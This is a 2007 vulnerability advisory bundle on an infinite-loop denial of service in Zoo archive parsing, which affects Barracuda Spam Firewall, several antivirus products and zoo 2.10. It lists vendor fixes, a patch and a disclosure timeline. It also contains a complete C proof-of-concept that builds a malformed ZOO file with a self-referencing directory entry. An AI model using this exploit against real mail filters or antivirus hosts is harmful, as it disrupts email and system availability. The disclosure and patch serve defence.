zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. (1) Barracuda Spam Firewall Or (2) Spam Firewall ,and (3) AMaViS Used in etc. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. The vulnerability is caused due to an error in the handling of Zoo archives. This can be exploited to cause an infinite loop resulting in high CPU utilisation. SOLUTION: Update to firmware version 3.4 and virus definition 2.0.6399 or later. PROVIDED AND/OR DISCOVERED BY: Jean-Sebastien Guay-Leroux ORIGINAL ADVISORY: Barracuda Networks: http://www.barracudanetworks.com/ns/resources/tech_alert.php Jean-Sebastien Guay-Leroux: http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Topic: Multiple vendors ZOO file decompression infinite loop DoS Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673 I. BACKGROUND Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension. II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition. III. AFFECTED SOFTWARES o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip IV. IMPACT If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests. If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server. V. SOLUTION o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007. o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007. o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007. o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software. o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software. o WinAce was contacted but no response was received from them. o PicoZip was contacted but no response was received from them. VI. PROOF OF CONCEPT Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability. Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed. /* Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS coded by Jean-S\xe9bastien Guay-Leroux September 2006 */ #include <stdio.h> #include <stdlib.h> #include <string.h> // Structure of a ZOO header #define ZOO_HEADER_SIZE 0x0000002a #define ZH_TEXT 0 #define ZH_TAG 20 #define ZH_START_OFFSET 24 #define ZH_NEG_START_OFFSET 28 #define ZH_MAJ_VER 32 #define ZH_MIN_VER 33 #define ZH_ARC_HTYPE 34 #define ZH_ARC_COMMENT 35 #define ZH_ARC_COMMENT_LENGTH 39 #define ZH_VERSION_DATA 41 #define D_DIRENTRY_LENGTH 56 #define D_TAG 0 #define D_TYPE 4 #define D_PACKING_METHOD 5 #define D_NEXT_ENTRY 6 #define D_OFFSET 10 #define D_DATE 14 #define D_TIME 16 #define D_FILE_CRC 18 #define D_ORIGINAL_SIZE 20 #define D_SIZE_NOW 24 #define D_MAJ_VER 28 #define D_MIN_VER 29 #define D_DELETED 30 #define D_FILE_STRUCT 31 #define D_COMMENT_OFFSET 32 #define D_COMMENT_SIZE 36 #define D_FILENAME 38 #define D_VAR_DIR_LEN 51 #define D_TIMEZONE 53 #define D_DIR_CRC 54 #define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 ) #define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 ) #define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 ) void put_byte (char *ptr, unsigned char data) { *ptr = data; } void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); } void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); } FILE * open_file (char *filename) { FILE *fp; fp = fopen ( filename , "w" ); if (!fp) { perror ("Cant open file"); exit (1); } return fp; } void usage (char *progname) { printf ("\nTo use:\n"); printf ("%s <archive name>\n\n", progname); exit (1); } int main (int argc, char *argv[]) { FILE *fp; char *hdr = (char *) malloc (4096); char *filename = (char *) malloc (256); int written_bytes; int total_size; if ( argc != 2) { usage ( argv[0] ); } strncpy (filename, argv[1], 255); if (!hdr || !filename) { perror ("Error allocating memory"); exit (1); } memset (hdr, 0x00, 4096); // Build a ZOO header memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18); put_longword (hdr + ZH_TAG, 0xfdc4a7dc); put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE); put_longword (hdr + ZH_NEG_START_OFFSET, (ZOO_HEADER_SIZE) * -1); put_byte (hdr + ZH_MAJ_VER, 2); put_byte (hdr + ZH_MIN_VER, 0); put_byte (hdr + ZH_ARC_HTYPE, 1); put_longword (hdr + ZH_ARC_COMMENT, 0); put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0); put_byte (hdr + ZH_VERSION_DATA, 3); // Build vulnerable direntry struct put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc); put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1); put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a); put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71); put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394); put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650); put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1); put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0); put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0); memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME, "AAAAAAAA.AAA", 13); total_size = ZOO_HEADER_SIZE + 51; fp = open_file (filename); if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) { printf ("The file has been written\n"); } else { printf ("Cant write to the file\n"); exit (1); } fclose (fp); return 0; } VII. PATCH To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems: diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; /* directory entry */ int first_dir = 1; /* first dir entry seen? */ +unsigned long zoo_pointer = 0; /* Track our position in the file */ static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data begins */ + + /* Begin tracking our position in the file */ + zoo_pointer = zoo_header.zoo_start; } #ifndef PORTABLE @@ -597,6 +601,12 @@ } /* end if */ loop_again: + + /* Make sure we are not seeking to already processed data */ + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */ } /* end while */ diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; /* show file protection */ #endif int first_dir = 1; /* if first direntry -- to adjust dat_ofs */ +unsigned long zoo_pointer = 0; /* Track our position in the file */ while (*option) { switch (*option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); /* show archive comment */ } + /* Begin tracking our position in the file */ + zoo_pointer = zoo_header.zoo_start; + /* Seek to the beginning of the first directory entry */ if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char *) NULL); } /* end if (lots of conditions) */ + + /* Make sure we are not seeking to already processed data */ + if (direntry.next <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = direntry.next; /* ..seek to next dir entry */ zooseek (zoo_file, direntry.next, 0); VIII. CREDITS Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. IX. REFERENCES 1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669 2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670 3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671 4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672 5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673 X. HISTORY 2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure